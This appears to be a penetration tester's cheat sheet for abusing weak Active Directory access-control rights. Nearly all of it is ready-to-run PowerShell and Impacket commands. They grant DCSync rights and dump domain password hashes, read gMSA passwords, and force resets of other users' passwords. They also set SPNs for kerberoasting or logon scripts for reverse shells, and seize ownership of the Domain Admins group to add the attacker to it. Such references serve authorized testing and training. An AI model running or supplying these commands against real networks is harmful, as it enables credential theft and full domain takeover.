Abuse Weak Access Control Lists (ACLs)

Write DACL

$SecPassword = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUser,$SecPassword

Add-ObjectACL -PrincipalIdentity compromiseduser -Credential $cred -Rights DCSync

From the attacking box

secretsdumps.py $domain/user@$ip

GetChangesAll (DCSync)

From the attacking box

secretsdump.py domain/user@ip

Or use Mimikatz

ReadGMSApassword

Remotely

You may need to use ntpdate $domain if you get clockscrew error

python2 /opt/gMSADumper/gMSADumper.py -d $domain -u CompromisedUser -p Password

Locally

.\GMSAPasswordReader.exe --AccountName 'ReadGMSApassword_Rights_To_User'

ForceChangePassword

$CompromisedUserName = 'CompromisedUserName'

$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass

$LateralEscUserPass = ConvertTo-SecureString 'LateralEscUserPass' -AsPlainText -Force

Set-DomainUserPassword -Identity LateralEscUserName -AccountPassword $LateralEscUserPass -Credential $Cred

GenericAll

$CompromisedUserName = 'CompromisedUserName'

$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass

Invoke-Command -computername 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity LateralEscUserName -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'password' -force)} -Credential $cred

GenericWrite

Use this for reverseshell using scriptpath=, enumeration, or use serviceprincipalname= for kerberoast

$CompromisedUserName = 'CompromisedUserName'

$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass

Set-DomainObject -Credential $Cred -Identity LateralEscUserName -SET @{serviceprincipalname='thescriptkid/thescriptkid'}

Get-DomainSPNTicket -Credential $Cred LateralEscUserName | fl

OR

Set-DomainObject -Credential $Cred -Identity LateralEscUserName -SET @{scriptpath='C:\\path\\to\\script.ps1'}

WriteOwner

$CompromisedUserName = 'CompromisedUserName'

$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass

Set-DomainObjectOwner -Credential $Cred -Identity "Domain Admins" -OwnerIdentity CompromisedUser

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -PrincipalIdentity CompromisedUser -Rights All

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'CompromisedUser' -Credential $Cred

Automation

Find ACLs of interest whether it be the current compromised user, or users found. start with current user.

Find-InterestingDomainAcl -ResolveGUIDs | where-object {$_.identityreferencename -like "*CompromisedUser*"}

Find-InterestingDomainAcl -ResolveGUIDs | where-object {$_.ActiveDirectoryRights -like "*GenericAll*"} | Where-Object {$_.identityreferenceclass -ne "computer"}